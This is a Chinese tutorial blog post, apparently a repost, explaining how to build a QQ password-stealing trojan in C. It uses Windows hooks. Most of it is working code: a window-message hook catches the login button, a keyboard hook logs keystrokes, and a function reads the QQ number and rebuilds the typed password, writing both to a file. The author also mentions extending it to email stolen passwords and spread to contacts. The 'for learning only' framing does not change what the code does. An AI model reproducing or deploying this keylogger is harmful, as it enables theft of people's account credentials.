安卓c语言hook,C语言hook技术实现木马功能-盗QQ密码「建议收藏」

安卓c语言hook,C语言hook技术实现木马功能-盗QQ密码「建议收藏」该楼层疑似违规已被系统折叠隐藏此楼查看此楼}else{//卸载钩子bRet=UnhookWindowsHookEx(g_hProc)&&UnhookWindowsHookEx(g_hKey);g_hProc=NULL;g_hKey=NULL;g_hNum=NULL;}returnbRet;}上面是安装HOOK部分的代码,就这么简单,上面提到了CallWnd…

大家好,又见面了,我是你们的朋友全栈君。

该楼层疑似违规已被系统折叠 隐藏此楼查看此楼

}

else

{

// 卸载钩子

bRet = UnhookWindowsHookEx(g_hProc) && UnhookWindowsHookEx(g_hKey);

g_hProc = NULL;

g_hKey = NULL;

g_hNum = NULL;

}

return bRet;

}

上面是安装HOOK部分的代码,就这么简单,上面提到了CallWndProc,KeyboardProc是两个回调函数,是我第三部分要解释的钩子函数。

3,钩子函数的解释

CallWndProc,KeyboardProc是两个回调函数的原型和具体代码如下:

// 钩子过程,监视“登陆”的命令消息

LRESULT CALLBACK CallWndProc(int nCode, WPARAM wParam, LPARAM lParam)

{

CWPSTRUCT *p = (CWPSTRUCT *)lParam;

// 捕获“登陆”按钮

if (p->message == WM_COMMAND && p->wParam ==16032)

//下面个函数是我在第四部分介绍-“处理密码”部分会仔细说明

//当用户点了登陆按钮,说明QQ号码和QQ密码已经填写完毕,当然可以去获得密码了

GetPasswrod();

return CallNextHookEx(g_hProc, nCode, wParam, lParam);

}

// 键盘钩子过程,监视“登陆”的热键消息

LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)

{

// 捕获热键消息,记录键盘的按键盘过程,pmsg是PMSG类型的,i是全局Static类型的

pmsg[i].wParam =wParam;

i++;

if (wParam == VK_RETURN) //用户使用键盘“回车”来登陆,用户用了回车后,就可以可以去获得密码了

GetPasswrod();

return CallNextHookEx(g_hKey, nCode, wParam, lParam);

}

在明白了这两个钩子函数后就可以看后期是如何具体处理密码的了,这就是下面的第四部分内容

处理密码

如果您读到了此处,我想得暂停一会,先让我来帮你回忆一下前面提到的几个关键的变量

第一个:QQ号的子窗口句柄 g_hNum

第二个:QQ密码的子窗口句柄 g_hPsw //此部分暂时不使用,下面

第三个:存键盘按键的 pmsg

上面三变量分别出现在第二部分和第三部分,都是全局共享(shared)变量

QQ密码的子窗口句柄 g_hPsw 此部分暂时不使用,你可以看到下面代码中有句用到g_hPsw的语句是我注释掉了的,原因是无法通过那样去得到QQ密码,得处理按键消息

void GetPasswrod()

{

//声明变量和初始化

HANDLE f;

TCHAR num[13];

TCHAR psw[21];

TCHAR total[50];

int j;

memset(num,0,sizeof(num));

memset(total,0,sizeof(total));

memset(psw,0,sizeof(psw));

DWORD dw;

//得到QQ号的内容,以为有的人的QQ号是在登陆框有记录,其QQ号并是用键盘输入的

GetWindowText(g_hNum,(LPSTR)num,sizeof(num));

//GetWindowText(g_hPsw,(LPSTR)psw,sizeof(psw)); //此句不使用,无法这样获得密码

//提取出键盘记录,此内容也许全是密码,也许是QQ号+QQ密码

for(j=0;j<20;j++)

{

psw[j]=(TCHAR)pmsg[j*2].wParam ;

}

psw[j+1]=’\0’;

//把QQ号码和QQ密码写入C盘password.txt中

f=CreateFile(“c:\\password.txt”,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);

strcat(total,”号码”);

strcat(total,num);

strcat(total,”密码:”);

strcat(total,psw);

WriteFile(f,&total,sizeof(total),&dw,NULL);

CloseHandle(f);

}

最后在C盘password.txt也许会出现这样两种情况:

1)当QQ号是没有用输入,而已用的粘贴或者是电脑以前有记录则是:号码:21728812密码:TEST

2) 当QQ号是用的键盘输入,电脑没有QQ号记录时则是:号码:21728812密码:21728812TEST

可以看出,第2种情况把QQ当成了密码了,所以密码还得减去QQ号,

特别说明:我这样直接处理wParam参数,得到的字符密码全是大写的,具体大小写问题我没有就没有仔细去处理的,功能实现就行了,毕竟我使用他不用来盗密码的!

上面四部分基本上获得密码的功能介绍完毕。凡是没有介绍的变量皆是全局变量,没有提到的函数 如:GetWindowThreadProcessId(),SetWindowsHookEx(),UnhookWindowsHookEx(),CallNextHookEx(),CreateFile(),WriteFile() 等皆是Windows API,详细使用说明请查MSDN(http://www.msdn.com),我提到的“HOOK”,“钩子”是同一个意思,也许有的地方我说的钩子函 数,而另外一个地方说的是HOOK函数

按照“真正”的QQ“木马”来写,如:对QQ版本进行识别,密码自动发送到E-MAIL,加入QQ尾巴代码,使其自动传给好友的等功能,这里仅是向大家展示一下一些基本功能是怎么实现的,仅供学习。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/162170.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号